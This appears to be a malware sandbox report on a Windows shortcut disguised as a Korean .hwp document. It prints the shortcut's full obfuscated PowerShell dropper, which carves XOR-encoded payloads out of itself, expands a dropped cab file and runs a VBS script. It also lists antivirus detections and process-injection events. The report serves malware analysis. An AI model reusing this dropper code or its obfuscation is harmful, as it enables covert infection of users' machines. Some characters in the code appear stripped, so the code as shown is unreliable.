cmdline	"C:\Windows\system32\cmd.exe" /c for /f "tokens=" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\.exe ^\| findstr /i rshell.exe') do (if exist "%f" (%f "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${````[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${````[~},0,<#salt conviction#>${~[)==}); ${~``=.-}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${````[~}[${ #}0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;} = lovely -conclusion ${==@}; <#everybody only#>if(${][;}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;} = lovely -conclusion ${==@};} return ${][;};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '.','lnk'), [System.IO.SearchOption]::AllDirectories) \| <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${ } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};" ) )

File has been identified by 18 AntiVirus engines on VirusTotal as malicious (18 events)

CTX	lnk.trojan.generic
Skyhigh	BehavesLike.Dropper.tx
Symantec	Scr.Mallnk!gen4
ESET-NOD32	LNK/Agent.AHE
TrendMicro-HouseCall	HEUR_LNKEXEC.A
Avast	LNK:Agent-HN [Trj]
Kaspersky	HEUR:Trojan.Multi.Agent.gen
Rising	Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
TrendMicro	HEUR_LNKEXEC.A
Sophos	Mal/PowLnkObf-A
Google	Detected
ZoneAlarm	Mal/PowLnkObf-A
VBA32	Trojan.Link.Crafted
Tencent	Win32.Trojan.Agent.Kflw
huorong	HEUR:Trojan/LNK.Runner.b
Fortinet	LNK/Agent.AHE!tr
AVG	LNK:Agent-HN [Trj]
alibabacloud	Trojan:Win/Agent.AJM

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\system32\expand.exe" C:\Users\Public\activity.cab -F:* C:\Users\Public\documents

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2548 resumed a thread in remote process 2660
NtResumeThread April 3, 2025, 10:19 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2660	1	0	0

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\expand.exe

가상자산 사업자 자금세탁방지 감독 방향.hwp.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All